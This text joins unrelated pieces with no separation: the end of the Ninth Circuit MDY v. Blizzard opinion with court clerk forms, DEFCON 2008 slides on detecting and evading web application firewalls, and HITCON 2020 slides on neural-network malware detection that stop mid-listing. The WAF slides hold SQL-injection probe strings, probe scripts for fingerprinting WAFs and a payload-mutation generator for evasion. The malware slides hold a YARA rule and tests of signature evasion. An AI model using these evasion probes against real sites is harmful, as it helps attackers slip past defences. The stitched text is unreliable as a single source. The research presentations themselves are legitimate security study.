breach; (4) the impropriety of MDY’s interference; and (5)
resulting damages. See Safeway Ins. Co. v. Guerrero, 106
P.3d 1020, 1025 (Ariz. 2005); see also Antwerp Diamond
Exch. of Am., Inc. v. Better Bus. Bur. of Maricopa County,
Inc., 637 P.2d 733, 740 (Ariz. 1981).
Blizzard satisfies four of these five elements based on
undisputed facts. First, a valid contractual relationship exists
between Blizzard and its customers based on the operative
EULA and ToU. Second, MDY was aware of this relation-
ship: it does not contend that it was unaware of the operative
EULA and ToU, or unaware that using Glider breached their
terms. In fact, after Blizzard first attempted to ban Glider
users, MDY modified its website to notify customers that
using Glider violated the ToU. Third, MDY intentionally
interfered with Blizzard’s contracts. After Blizzard used War-
den to ban a majority of Glider users in September 2005,
MDY programmed Glider to be undetectable by Warden.
Finally, Blizzard has proffered evidence that it was damaged
by MDY’s conduct.
Thus, Blizzard is entitled to summary judgment if there are
no triable issues of material fact as to the fourth element of
its tortious interference claim: whether MDY’s actions were
improper. To determine whether a defendant’s conduct was
improper, Arizona employs the seven-factor test of Restate-
ment (Second) of Torts § 767. See Safeway, 106 P.3d at 1027;
see also Wagenseller v. Scottsdale Mem’l Hosp., 710 P.2d
1025, 1042-43 (Ariz. 1985), superseded in other respects by
A.R.S. § 23-1501. The seven factors are (1) the nature of
MDY’s conduct, (2) MDY’s motive, (3) Blizzard’s interests
with which MDY interfered, (4) the interests MDY sought to
advance, (5) the social interests in protecting MDY’s freedom
of action and Blizzard’s contractual interests, (6) the proxim-
ity or remoteness of MDY’s conduct to the interference, and
(7) the relations between MDY and Blizzard. Id. A court
should give greatest weight to the first two factors. Id. We
conclude that summary judgment was inappropriate here,
because on the current record, taking the facts in the light
most favorable to MDY, the first five factors do not clearly
weigh in either side’s favor, thus creating a genuine issue of
material fact.
1. Nature of MDY’s conduct and MDY’s motive
The parties have presented conflicting evidence with
respect to these two most important factors. Blizzard’s evi-
dence tends to demonstrate that MDY helped Glider users
gain an advantage over other WoW players by advancing
automatically to a higher level of the game. Thus, MDY
knowingly assisted Glider users to breach their contracts, and
then helped to conceal those breaches from Blizzard. Bliz-
zard’s evidence also supports the conclusion that Blizzard was
negatively affected by MDY’s Glider sales, because Glider
use: (1) distorts WoW’s virtual economy by flooding it with
excess resources; (2) interferes with WoW players’ ability to
interact with other human players in the virtual world; and (3)
strains Blizzard’s servers because bots spend more continuous
time in-game than do human players. Finally, Blizzard intro-
duced evidence that MDY’s motive was its three and a half
to four million dollar profit.
On the other hand, MDY proffered evidence that it created
Glider in 2005, when Blizzard’s ToU did not explicitly pro-
hibit bots.21 Glider initially had no anti-detection features.
MDY added these features only after Blizzard added Warden
to WoW. Blizzard did not change the EULA or ToU to pro-
scribe bots such as Glider explicitly until after MDY began
selling Glider. Finally, MDY has introduced evidence that
Glider enhances some players’ experience of the game,
including players who might otherwise not play WoW at all.
Taking this evidence in the light most favorable to MDY,
there is a genuine issue of material fact as to these factors.
2. Blizzard’s interests with which MDY interferes; the
interest that MDY seeks to advance; the social interest
in protecting MDY’s and Blizzard’s respective interests
Blizzard argues that it seeks to provide its millions of WoW
players with a particular role-playing game experience that
excludes bots. It contends, as the district court determined,
that MDY’s interest depends on inducing Blizzard’s custom-
ers to breach their contracts. In contrast, MDY argues that
Glider is an innovative, profitable software program that has
positively affected its users’ lives by advancing them to
WoW’s more interesting levels. MDY has introduced evi-
[21] When MDY created Glider in 2005, Blizzard's ToU prohibited the use
of “cheats” and “unauthorized third-party software” in connection with
WoW. The meaning of these contractual terms, including whether they
prohibit bots such as Glider, is ambiguous. In Arizona, the construction of
ambiguous contract provisions is a jury question. See Clark v. Compania
Ganadera de Cananea, S.A., 385 P.2d 691, 697-98 (Ariz. 1963).
dence that Glider allows players with limited motor skills to
continue to play WoW, improves some users’ romantic rela-
tionships by reducing the time that they spend playing WoW,
and allows users who work long hours to play WoW. We fur-
ther note that, if the fact-finder decides that Blizzard did not
ban bots at the time that MDY created Glider, the fact-finder
might conclude that MDY had a legitimate interest in continu-
ing to sell Glider. Again, the parties’ differing evidence
creates a genuine issue of material fact that precludes an
award of summary judgment.
3. Proximity of MDY’s conduct to the interference;
relationship between MDY and Blizzard
[23] MDY’s Glider sales are the but-for cause of Glider
users’ breach of the operative ToU. Moreover, Blizzard and
MDY are not competitors in the online role-playing game
market; rather, MDY’s profits appear to depend on the contin-
ued popularity of WoW. Blizzard, however, chose not to
authorize MDY to sell Glider to its users. Even accepting that
these factors favor Blizzard, we do not think that they inde-
pendently warrant a grant of summary judgment to Blizzard.
As noted, we cannot hold that five of the seven “impropriety”
factors compel a finding in Blizzard’s favor at this stage,
including the two (nature of MDY’s conduct and MDY’s
motive) that the Arizona courts deem most important.
Accordingly, we vacate the district court’s grant of summary
judgment to Blizzard.[22]
B. Copyright Act preemption
MDY contends that Blizzard’s tortious interference claim
is preempted by the Copyright Act. The Copyright Act pre-
empts state laws that confer rights equivalent to the exclusive
[22] Because the district court entered a permanent injunction based on
MDY’s liability for tortious interference, we also vacate that permanent
injunction.
rights of copyright under 17 U.S.C. § 106 (i.e., reproduction,
distribution, public display, public performance, and creation
of derivative works). 17 U.S.C. § 301(a). However, the Copy-
right Act does not preempt state law remedies with respect to
“activities violating legal or equitable rights that are not
equivalent to any of the exclusive rights [of copyright].” 17
U.S.C. § 301(b)(3).
[24] Whether, in these circumstances, tortious interference
with contract is preempted by the Copyright Act is a question
of first impression in this circuit. However, we have previ-
ously addressed a similar tortious interference cause of action
under California law and found it not preempted. See Altera
Corp. v. Clear Logic, Inc., 424 F.3d 1079, 1089-90 (9th Cir.
2005). In so holding, we relied on the Seventh Circuit’s analy-
sis in ProCD, 86 F.3d 1447, which explained that because
contractual rights are not equivalent to the exclusive rights of
copyright, the Copyright Act’s preemption clause usually
does not affect private contracts. Altera, 424 F.3d at 1089; see
ProCD, 86 F.3d at 1454 (“A copyright is a right against the
world. Contracts, by contrast, generally affect only their par-
ties; strangers may do as they please, so contracts do not
create ‘exclusive rights.’ ”). The Fourth, Fifth, and Eighth
Circuits have also held that the Copyright Act does not pre-
empt a party’s enforcement of its contractual rights. See Nat’l
Car Rental Sys., Inc. v. Comp. Assoc. Int’l, Inc., 991 F.2d 426,
433 (8th Cir. 1993); Taquino v. Teledyne Monarch Rubber,
893 F.2d 1488, 1501 (5th Cir. 1990); Acorn Structures, Inc.
v. Swantz, 846 F.2d 923, 926 (4th Cir. 1988).
[25] This action concerns the anti-bot provisions of ToU
§ 4(b)(ii) and (iii), which we have held are contract-
enforceable covenants rather than copyright-enforceable con-
ditions. We conclude that since Blizzard seeks to enforce con-
tractual rights that are not equivalent to any of its exclusive
rights of copyright, the Copyright Act does not preempt its
tortious interference claim. Cf. Altera, 424 F.3d at 1089-90.
Accordingly, we hold that Blizzard’s tortious interference
claim under Arizona law is not preempted by the Copyright
Act, but we vacate the grant of summary judgment because
there are outstanding issues of material fact.[23]
VII.
The district court found that Donnelly was personally liable
for MDY’s tortious interference with contract, secondary
copyright infringement, and DMCA violations. We vacate the
district court’s decision because we determine that MDY is
not liable for secondary copyright infringement and is liable
under the DMCA only for violation of § 1201(a)(2) with
respect to WoW’s dynamic non-literal elements. In addition,
we conclude that summary judgment is inappropriate as to
Blizzard’s claim for tortious interference with contract under
Arizona law. Accordingly, on remand, the district court shall
reconsider the issue of Donnelly’s personal liability.
24 The
district court’s decision is VACATED and the case is
REMANDED to the district court for further proceedings
consistent with this opinion.
Each side shall bear its own costs.
[23] Because we determine that there are triable issues of fact, we need not,
and do not, address MDY’s further contentions: that (1) Blizzard has
unclean hands because it changed the ToU to ban bots after this litigation
began; and (2) MDY is not liable for tortious interference because it only
“honestly persuaded” people to buy Glider.
[24] If MDY is found liable at trial for tortious interference with contract,
the district court may consider Donnelly’s personal liability for that tor-
tious interference. Moreover, the district court may determine whether
Donnelly is personally liable for MDY’s violation of DMCA § 1201(a)(2).
In light of the foregoing disposition regarding Donnelly’s personal liabil-
ity, we also vacate in toto the district court’s permanent injunction against
Donnelly, though the district court may consider the propriety of an
injunction against Donnelly if it finds him liable for MDY’s § 1201(a)(2)
violations or for tortious interference with contract.
United States Court of Appeals for the Ninth Circuit
Office of the Clerk
95 Seventh Street
San Francisco, CA 94103
Information Regarding Judgment and Post-Judgment Proceedings
(December 2009)
Judgment
• This Court has filed and entered the attached judgment in your case. Fed. R. App. P. 36. Please note the filed date on the attached decision because all of the dates described below run from that date, not from the date you receive this notice.
Mandate (Fed. R. App. P. 41; 9th Cir. R. 41-1 & -2)
• The mandate will issue 7 days after the expiration of the time for filing a petition for rehearing or 7 days from the denial of a petition for rehearing, unless the Court directs otherwise. To file a motion to stay the mandate, file it electronically via the appellate ECF system or, if you are a pro se litigant or an attorney with an exemption from using appellate ECF, file one original motion on paper.
Petition for Panel Rehearing (Fed. R. App. P. 40; 9th Cir. R. 40-1)
Petition for Rehearing En Banc (Fed. R. App. P. 35; 9th Cir. R. 35-1 to -3)
(1) A. Purpose (Panel Rehearing):
• A party should seek panel rehearing only if one or more of the following grounds exist:
► A material point of fact or law was overlooked in the decision;
► A change in the law occurred after the case was submitted which appears to have been overlooked by the panel; or
► An apparent conflict with another decision of the Court was not addressed in the opinion.
• Do not file a petition for panel rehearing merely to reargue the case.
B. Purpose (Rehearing En Banc)
• A party should seek en banc rehearing only if one or more of the following grounds exist:
► Consideration by the full Court is necessary to secure or maintain uniformity of the Court's decisions; or
► The proceeding involves a question of exceptional importance; or
► The opinion directly conflicts with an existing opinion by another court of appeals or the Supreme Court and substantially affects a rule of national application in which there is an overriding need for national uniformity.
(2) Deadlines for Filing:
• A petition for rehearing may be filed within 14 days after entry of judgment. Fed. R. App. P. 40(a)(1).
• If the United States or an agency or officer thereof is a party in a civil case, the time for filing a petition for rehearing is 45 days after entry of judgment. Fed. R. App. P. 40(a)(1).
• If the mandate has issued, the petition for rehearing should be accompanied by a motion to recall the mandate.
• See Advisory Note to 9th Cir. R. 40-1 (petitions must be received on the due date).
• An order to publish a previously unpublished memorandum disposition extends the time to file a petition for rehearing to 14 days after the date of the order of publication or, in all civil cases in which the United States or an agency or officer thereof is a party, 45 days after the date of the order of publication. 9th Cir. R. 40-2.
(3) Statement of Counsel
• A petition should contain an introduction stating that, in counsel's judgment, one or more of the situations described in the "purpose" section above exist. The points to be raised must be stated clearly.
(4) Form & Number of Copies (9th Cir. R. 40-1; Fed. R. App. P. 32(c)(2))
• The petition shall not exceed 15 pages unless it complies with the alternative length limitations of 4,200 words or 390 lines of text.
• The petition must be accompanied by a copy of the panel's decision being challenged.
• An answer, when ordered by the Court, shall comply with the same length limitations as the petition.
• If a pro se litigant elects to file a form brief pursuant to Circuit Rule 28-1, a petition for panel rehearing or for rehearing en banc need not comply with Fed. R. App. P. 32.
• The petition or answer must be accompanied by a Certificate of Compliance found at Form 11, available on our website under Forms.
• You may file a petition electronically via the appellate ECF system. No paper copies are required unless the Court orders otherwise. If you are a pro se litigant or an attorney exempted from using the appellate ECF system, file one original petition on paper. No additional paper copies are required unless the Court orders otherwise.
Bill of Costs (Fed. R. App. P. 39, 9th Cir. R. 39-1)
• The Bill of Costs must be filed within 14 days after entry of judgment.
• See Form 10 for additional information, available on our website under Forms.
Attorneys Fees
• Ninth Circuit Rule 39-1 describes the content and due dates for attorneys fees applications.
• All relevant forms are available on our website under Forms or by telephoning (415) 355-7806.
Petition for a Writ of Certiorari
• Please refer to the Rules of the United States Supreme Court.
Counsel Listing in Published Opinions
• Please check counsel listing on the attached decision.
• If there are any errors in a published opinion, please send a letter in writing within 10 days to:
► West Publishing Company; 610 Opperman Drive; PO Box 64526; St. Paul, MN 55164-0526 (Attn: Kathy Blesener, Senior Editor);
► and electronically file a copy of the letter via the appellate ECF system by using "File Correspondence to Court," or if you are an attorney exempted from using the appellate ECF system, mail the Court one copy of the letter.
Form 10. Bill of Costs (Rev. 12-1-09)
United States Court of Appeals for the Ninth Circuit
BILL OF COSTS
Note: If you wish to file a bill of costs, it MUST be submitted on this form and filed, with the clerk, with proof of service, within 14 days of the date of entry of judgment, and in accordance with 9th Circuit Rule 39-1. A late bill of costs must be accompanied by a motion showing good cause. Please refer to FRAP 39, 28 U.S.C. § 1920, and 9th Circuit Rule 39-1 when preparing your bill of costs.
______ v. ______, 9th Cir. No. ______. The Clerk is requested to tax the following costs against: ______
[Form table: for each filing (Excerpt of Record, Opening Brief, Answering Brief, Reply Brief, Other), the filer lists No. of Docs., Pages per Doc., Cost per Page and Total Cost under "REQUESTED" (each column must be completed); matching "ALLOWED" columns are to be completed by the Clerk.]
* Costs per page may not exceed .10 or actual cost, whichever is less. 9th Circuit Rule 39-1.
** Other: any other requests must be accompanied by a statement explaining why the item(s) should be taxed pursuant to 9th Circuit Rule 39-1. Additional items without such supporting statements will not be considered. Attorneys' fees cannot be requested on this form.
Form 10. Bill of Costs - Continued
I, ______, swear under penalty of perjury that the services for which costs are taxed were actually and necessarily performed, and that the requested costs were actually expended as listed.
Signature ______ ("s/" plus attorney's name if submitted electronically)  Date ______
Name of Counsel: ______  Attorney for: ______
(To Be Completed by the Clerk) Costs are taxed in the amount of $______
Clerk of Court, By: ______, Deputy Clerk  Date ______
Playing with Web Application Firewalls
DEFCON 16, August 8-10, 2008, Las Vegas, NV, USA
http://ws.hackaholic.org
Who is Wendel Guglielmetti Henrique ?
● Penetration Test analyst at SecurityLabs - Intruders Tiger Team Security division
(http://www.intruders.com.br) - One of the leading companies in the segment in Brazil,
among our clients are government, credit card industry, etc.
● Affiliated to Hackaholic team (http://hackaholic.org/).
● Has been working in IT since 1997, during the last 7 years he has worked in the
computer security field.
● Discovered vulnerabilities in many software programs like Webmails, Access Points,
Citrix Metaframe, etc.
● Wrote tools used as examples in articles in national magazines like PCWorld Brazil
and international ones like Hakin9 Magazine.
● Speaker at famous Brazilian conferences such as H2HC, Code Breakers and invited
as speaker to IT Underground 2006 - Italy and IT1TK1 2007 - Mexico.
AGENDA:
● What is WAF?
● Types of operation modes.
● Common topology.
● Passive or Reactive?
● Tricks to detect WAF systems.
● Tricks to fingerprint WAF systems.
● Generic evasion techniques.
● Specific techniques to evade WAF systems.
● What does it fail to protect ?
What is WAF?
Web Application Firewall (WAF): An intermediary device, sitting between a web-client
and a web server, analyzing OSI Layer-7 messages for violations in the programmed
security policy. A web application firewall is used as a security device protecting the
web server from attack.
Source: Web Application Security Consortium Glossary.
http://www.webappsec.org/projects/glossary/#WebApplicationFirewall
What is WAF?
● Web Application Firewalls are often called 'Deep Packet Inspection Firewalls' because they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web Service layers.
● Some Web Application Firewalls look for certain 'attack signatures' to try to identify a specific attack that an intruder may be sending, while others look for abnormal behavior that doesn't fit the website's normal traffic patterns.
● Web Application Firewalls can be either software or hardware appliance based and
are installed in front of a webserver in an effort to try and shield it from incoming
attacks.
What is WAF?
Some notes about definitions:
● Some modern WAF systems work both with attack signatures and abnormal
behavior.
● WAF systems do not necessarily need to be installed in front of a webserver, some
products allow installation directly into the Webserver machine.
● WAF systems do not necessarily detect only incoming attacks, nowadays many
products detect inbound and outbound attacks.
Types of operation modes:
Negative model (blacklist based).
Positive model (whitelist based).
Mixed model (mix negative and positive model protection).
Types of operation modes:
A negative security model recognizes attacks by relying on a database of expected attack signatures.
Example (a minimal sketch follows the Pros/Cons list below):
Do not allow, in any page, any argument value (user input) which matches potential XSS strings like <script>, </script>, String.fromCharCode, etc.
Pros:
● Less time to implement (plug and play or plug and hack? :).
Cons:
● More false positives.
● More processing time.
● Less protection.
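A minimal Python sketch of the negative-model example above (not from the original deck; the signature list is illustrative, not any vendor's real rule set):

import re

XSS_SIGNATURES = [r"<\s*script", r"<\s*/\s*script", r"String\.fromCharCode"]

def is_hostile(value):
    # Negative model: flag the parameter if any known signature matches.
    return any(re.search(sig, value, re.IGNORECASE) for sig in XSS_SIGNATURES)

print(is_hostile("hello world"))                # False -> allowed
print(is_hostile("<ScRiPt>alert(1)</script>"))  # True  -> blocked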
Types of operation modes:
A positive security model enforces positive behavior by learning the application logic
and then building a security policy of valid known requests as a user interacts with the
application.
Example (see the whitelist sketch below):
Page news.jsp: the field id may only accept characters [0-9], with values ranging from 0 to 65535.
Pros:
● Better performance (less rules).
● Less false positives.
Cons:
● Much more time to implement.
● Some vendors provide “automatic learning mode”, they help, but are far from perfect,
in the end, you always need a skilled human to review the policies.
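A minimal Python sketch of the positive-model example above (again illustrative, not a real product's policy format):

def id_is_valid(value):
    # Positive model: only digits, and only the range 0..65535, are accepted;
    # everything else is rejected by default.
    return value.isdigit() and 0 <= int(value) <= 65535

print(id_is_valid("254"))      # True  -> allowed
print(id_is_valid("1' OR 1"))  # False -> blocked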
Types of operation modes:
A mixed mode uses both a negative and a positive model; in general one of them is predominant.
Common topology:
In general WAF systems can be used with 3 different network topologies:
● Between the webserver and the webclient (the most common).
● Integrated into the webserver (used in small environments).
● Connected in a switch via port mirror, also referred to as Switched Port Analyzer (SPAN) or Roving Analysis Port (RAP). (Better performance.)
Passive or Reactive?
● Most WAF systems can work in both modes: passive and reactive.
● In general, passive mode is used during the first days, to prevent real users from being blocked by false positives.
● In production environments most WAF systems run in reactive mode.
Tricks to detect WAF systems:
WAF systems leave several signs which permit us to detect them, like:
● Cookies – Some WAF products add their own cookie in the HTTP communication.
Example – Citrix Netscaler:
GET /news.asp?PageId=254 HTTP/1.1
Host: www.SomeSite.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.12)
Accept: image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://www.SomeSite.com
Cookie:ASPSESSIONCWKSPSVLTF=OUESYHFAPQLFMNBTKJHGQGXM;
ns_af=xL9sPs2RIJMF5GhtbxSnol+xU0uSx;
ns_af_.SomeSite.com_%2F_wat=KXMhOJ7DvSHNDkBAHDwMSNsFHMSFHEmSr?nmEkaen19mlrw
Bio1/lsrzV810C&
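A rough Python sketch of this cookie check (only ns_af, the Netscaler cookie from the capture above, is assumed; extend the tuple with other vendors' cookie names as you learn them):

import urllib.request

def waf_cookie_hints(url, known=("ns_af",)):
    resp = urllib.request.urlopen(url)
    cookies = resp.headers.get_all("Set-Cookie") or []
    # Any cookie whose name matches a known WAF product is a strong hint.
    return [c for c in cookies if c.split("=", 1)[0].strip() in known]

print(waf_cookie_hints("http://www.SomeSite.com/news.asp?PageId=254"))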
Tricks to detect WAF systems:
● Header Rewrite – Some WAF products allow the rewriting of HTTP headers. The most commonly rewritten field is Server, which is used to try to deceive attackers.
Interesting behavior: these differences in behavior allow us to detect the presence of WAF systems. Some WAF vendors:
- Only rewrite the header in hostile requests.
- Depending on the hostile request, remove the Server field from the HTTP response.
- If the request is valid and non-hostile, keep the original webserver response.
Tricks to detect WAF systems:
Example – HTTP response – Valid and non hostile request:
HTTP/1.1 200 OK
Date: Fri, 27 Jun 2008 23:14:50 GMT
Server: Apache/2.2.9 (Unix)
X-Powered-By: PHP/4.4.7
Content-Type: text/html
Content-Length: 71746
Example – HTTP response – hostile request:
HTTP/1.1 404 Not Found
Date: Fri, 27 Jun 2008 23:20:26 GMT
Server: Netscape-Enterprise/4.0
Content-Length: 213
Content-Type: text/html; charset=iso-8859-1
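A rough Python sketch of this comparison, sending one benign and one hostile request and diffing the Server banner (the hostile probe string is illustrative):

import urllib.request, urllib.error

def server_header(url):
    try:
        return urllib.request.urlopen(url).headers.get("Server")
    except urllib.error.HTTPError as e:
        return e.headers.get("Server")   # keep the banner of error responses too

base  = server_header("http://www.SomeSite.com/news.asp?PageId=254")
probe = server_header("http://www.SomeSite.com/news.asp?PageId=254%27%20OR%201=1--")
if base != probe:
    print("Server banner changed (%r -> %r): likely WAF rewrite" % (base, probe))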
Tricks to detect WAF systems:
● Some WAF vendors return different HTTP response error codes in the same URL
(valid one) if you insert a hostile parameter (even if the URL points to a file that doesn't
exist).
Example – HTTP response – Valid URL and hostile parameter:
HTTP/1.1 501 Method Not Implemented
Date: Fri, 27 Jun 2008 23:30:54 GMT
Allow: TRACE
Content-Length: 279
Connection: close
Content-Type: text/html; charset=iso-8859-1
Tricks to detect WAF systems:
● Some WAF vendors provide a feature to “close connection” with the attacker when a
hostile packet is found.
From mod_security documentation:
DROP Action: “Immediately initiate a "connection close" action to tear down the TCP
connection by sending a FIN packet.”
Attackers requesting hostile pages or parameters can detect mod_security.
NOTE: This feature is not available in old versions of mod_security.
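A rough Python sketch for spotting this DROP behavior, i.e. an abrupt TCP tear-down instead of an HTTP response (a sketch only; timeouts and HTTPS are left out):

import socket

def probe_drops_connection(host, path):
    s = socket.create_connection((host, 80), timeout=5)
    s.sendall(("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n" % (path, host)).encode())
    try:
        return s.recv(1024) == b""        # FIN with no answer
    except ConnectionResetError:
        return True                       # RST: also a tear-down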
Tricks to detect WAF systems:
NOTE: Some of these techniques can be used to detect IPS (Intrusion Prevention Systems) too.
Tricks to fingerprint WAF systems:
All (at least all that I know of) WAF systems have a built-in group of rules in negative mode. These rules differ in each product, and they can be:
● A specific rule for a specific well known vulnerability (for example: IIS Unicode attack).
● A generic rule for a specific well known class of vulnerability (for example: SQL Injections).
These rules are associated with an action (for example: DROP the request, Redirect to
another Page, etc).
Tricks to fingerprint WAF systems:
Attackers can create a set of attacks that tests whether a WAF protects against a range of known vulnerabilities. In this way we are able to identify the built-in rules of a product, and consequently which product it is.
Example – Set of attacks to WAF “A”:
● Request using HTTP method different from 1.0 and 1.1 (detected and action taken).
● Request with Content-Length where the method is different than POST (not
detected).
● URI with recursive path – even invalid path (detected and action taken).
● Request where Cookie name matches “cmd="” (detected and action taken).
● Request where URI matches “/usr/X11R6/bin/xterm” (not detected).
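The probe set above can be automated; a rough Python sketch using raw sockets (so that even invalid HTTP can be sent; the probe strings are illustrative):

import socket

PROBES = {
    "bad_http_version": b"GET / HTTP/3.14\r\nHost: %s\r\n\r\n",
    "recursive_path":   b"GET /a/../a/../ HTTP/1.1\r\nHost: %s\r\n\r\n",
    "xterm_uri":        b"GET /usr/X11R6/bin/xterm HTTP/1.1\r\nHost: %s\r\n\r\n",
}

def fingerprint(host):
    results = {}
    for name, template in PROBES.items():
        s = socket.create_connection((host, 80), timeout=5)
        s.sendall(template % host.encode())
        try:
            first_line = s.recv(128).split(b"\r\n")[0]
        except OSError:
            first_line = b"<dropped>"
        results[name] = first_line.decode(errors="replace")
        s.close()
    # The detected/not-detected pattern can be matched against known products.
    return results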
Tricks to fingerprint WAF systems:
The attacker can go deeper, and create several mutations for the same attack with
different evasion methods, allowing them to have more precise identification of WAF
systems and the version running.
Some techniques presented in “Tricks to detect WAF systems” slides can also be
useful to help fingerprint a WAF system.
These techniques can be used to create a big database allowing us to detect most
WAF systems and IPS on the market.
Generic evasion techniques:
Today we have a wide range of techniques to evade IPS and some WAF systems,
most of these attacks work because:
● Bad normalization and canonicalization implementations in the WAF system.
● Weak rules in the WAF system.
● Evasion at the network and transport layers in some cases affects IPS and some WAF systems (depending on topology and product).
Generic evasion techniques:
Common Examples:
● SQL comments in parameters to try to defeat some SQL Injection rules.
● Words in random case to try to defeat some SQL Injection rules.
● SQL query encoding (for example: hex encoding via database features).
● URI encoding (for example: Unicode forward slash).
● IP packet fragmentation.
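A rough Python sketch generating such mutations for one payload (transforms taken from the list above; real tooling would also add database-specific encodings):

import random

def mutate(payload):
    yield payload.replace(" ", "/**/")                                     # SQL comments
    yield "".join(random.choice((c.lower(), c.upper())) for c in payload)  # random case
    yield payload.replace("/", "%2f")                                      # URI encoding

for variant in mutate("UNION SELECT user FROM mysql.user"):
    print(variant)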
Specific techniques to evade WAF systems:
Just as attackers can fingerprint WAF systems, as presented, they can use the same technique to precisely identify which restrictions of a rule apply to a specific class of vulnerabilities.
Example – SQL Injection rule:
● An attacker can insert a hostile SQL Injection into a parameter and expect it to be detected and an action taken.
● Using trial and error, it is possible to identify specific combinations of strings and characters which are allowed or denied.
● This procedure can be repeated many times to identify, for example, which character combinations are allowed on their own but become denied when used in conjunction with other allowed combinations.
Specific techniques to evade WAF systems:
Once we are able to identify what is blacklisted and what is whitelisted, in many cases we are able to reconstruct our SQL query (or other attack) to match the requirements of a non-hostile request.
Example – Real life:
In a recent penetration test, we were able to bypass a Citrix Netscaler using this
technique.
Basically what we did after identifying the rules was rebuild the query like:
● Removing all “NULL” words.
● Use query encoding in some parts.
● Remove the single quote character “'”.
● And have fun! :)
What does it fail to protect ?
Some classes of attacks are really difficult to prevent, even for WAF systems, like:
● XSS – Cross Site Scripting is extremely mutable and consequently very hard to effectively protect against.
● File Uploads – Some WAF systems do a good job of protecting against hostile file uploads, but when dealing with webshell uploads (like php shell, asp shell, jsp shell, etc) they tend to fail against advanced evasion techniques.
● Remote Command Execution based on Server Response – It is extremely hard to effectively detect remote command execution attacks based on server responses (like a rule to identify signs of a "uname -na" or "id" command), because if the attacker is somehow able to interact with a shell, he can use many evasion methods to encode the output: hex-code, character replacement, etc.
NOTE: Hackaholic - We have a private forum and we are looking for skilled members.
Questions ?
wendel (at) security.org.br
2020
4141414141414141414
AAAAAAAAAAA
HITCON
[email protected]
Reversing In Wonderland
Neural Network Based Malware Detection Techniques
• Master degree at CSIE, NTUST
• Security Researcher - chrO.ot
• Speaker - BlackHat, DEFCON, HITCON, CYBERSEC
• [email protected]
• 30cm.tw & Hao's Arsenal
#Windows #Reversing #Pwn #Exploit
• Associate Professor of CSIE, NTUST
• Joint Associate Research Fellow of
CITI, Academia Sinica
• [email protected]
#4G #5G #LTE_Attack #IoT
1. Malware in the Wild
2. Semantics
3. Semantic-Aware: PV-DM
4. Asm2Vec & Experiment
5. Challenge
/?outline
〉〉〉Malware In the Wild
#behavior
rule silent_banker : banker {
meta:
description = "malware in the wild"
threat_level = 3
in_the_wild = true
strings:
$a = {6A 40 68 00 30 00 00 6A 14 8D 91}
$b = {8D 4D B0 2B C1 83 C0 27 59 F7 F9}
$c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
condition:
$a or $b or $c
}
YARA
[Figure: PE layout of malware.exe; the YARA strings $a, $b and $c are all present (at offsets +a0, +1e8 and +9f7c), so the rule fires: detected]
/?malware
[Figure, test #1: malware_test#1.bin is malware.exe with one matched region overwritten with \x00 bytes; result: still detected 😡]
/?malware
/?malware
[Figure, test #2: malware_test#2.bin overwrites another matched region with \x00 bytes; result: clear 👍]
[Figure, test #3: malware_test#3.bin patches a different region with \x00 bytes; result: detected 😡]
/?malware
#免殺 (AV evasion)
#AMSI
• Active Protection System
- rule-based, not strong enough against unknown attacks
• Malware Patterns based on Reversing
- lack of lexical semantics of assembly → false positives
- too slow against malware variants
• Known Challenges
- compiler optimization
- Mirai, Hakai, Yowai, SpeakUp
- Anti-AntiVirus techniques
• Word Embedding Techniques (NLP)
- use only a few samples to predict incoming binary files
- learn lexical semantics from instruction sequences
/?challenge
〉〉〉Semantics
“You shall know a word by the company it keeps“
(Firth, J. R. 1957:11)
/?semantics
“... I can show you the world. Shining,
shimmering, splendid. Tell me, princess,
now when did. You last let your heart
decide? I can open your eyes, Take you
wonder by wonder ...”
” I drink beer. and the other people“
” we drink wine. “
” I drink beer. “
” we drink wine. “
” I drink beer. “
” we guzzle wine. “
” I guzzle beer. “
/?tokenFreq
/?freq
[Figure: tokens plotted by their frequency vectors; 'drink' and 'guzzle' fall close together, as do 'cat', 'dog' and 'puppy']
/?cos(θ)
[Figure: vectors for 'King' and 'Man' separated by angle θ]
• Co-Occurrence Matrix
- count based, token frequency
- able to capture lexical semantics
- Cosine Similarity
• Issues
- vocabulary
- online training
→ Paragraph Vector Distributed Memory (PV-DM)
#semantics
〉〉〉Word2Vec
/?tokenFreq
[Figure: token-frequency vectors; each token (e.g. 'drink', 'behavior') is represented by a 4-dim count vector]
#Sim
similar(drink, guzzle)
= (0.13×0.13 + 0.01×0.01 + 0.99×0.93 + 0.01×0.01)
  / ( sqrt(0.13^2 + 0.01^2 + 0.99^2 + 0.01^2) × sqrt(0.13^2 + 0.01^2 + 0.93^2 + 0.01^2) )
= 0.9999650034397828
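The same cosine-similarity computation in Python (vectors taken from the slide; this reproduces the number above):

import math

def cosine(u, v):
    dot = sum(a * b for a, b in zip(u, v))
    return dot / (math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v)))

drink  = [0.13, 0.01, 0.99, 0.01]
guzzle = [0.13, 0.01, 0.93, 0.01]
print(cosine(drink, guzzle))   # 0.99996..., so 'drink' and 'guzzle' are near-synonyms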
more similar
sim(King - Man) ≒ sigmoid(King・Man)
King
Man
King
Man
Δ
sim(King - Man) ≒ sigmoid(King・Man)
[BACKWARD]: Man = Man - Δ(King - Man) * learningRate
Δ(King - Man) = (1 - sim(King - Man))・King
#negative
King
Man
sim(King - Man) ≒ sigmoid(King・Man)
[BACKWARD]: Man = Man - Δ(King - Man) * learningRate
Δ(King - Man) = sim(King - Man)・King
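Both updates can be written as one SGD step; a Python sketch in the standard word2vec form (label 1 for the positive pair, 0 for a negative sample; the slide's Δ is the same gradient up to sign convention):

import math

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

def sgd_step(king, man, label, lr=0.025):
    sim  = sigmoid(sum(a * b for a, b in zip(king, man)))
    grad = label - sim        # (1 - sim) pulls the pair together, (0 - sim) pushes apart
    return [m + lr * grad * k for m, k in zip(man, king)]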
#PV-DM
#Word2Vec
〉〉〉Asm2Vec
#Asm2Vec
#paragraph
File Header Opt Header
.AddressOfEntryPoint
.text
mov [ebp-0x04], 00
jmp block_c
cmp [ebp-0x04], Ah
jg Exit
push 0x3E8
call Sleep
jmp block_b
mov eax, [ebp-0x04]
add eax, 1
mov [ebp-0x04], eax
cmp [ebp-0x04], Ah
jg Exit
push 0x3E8
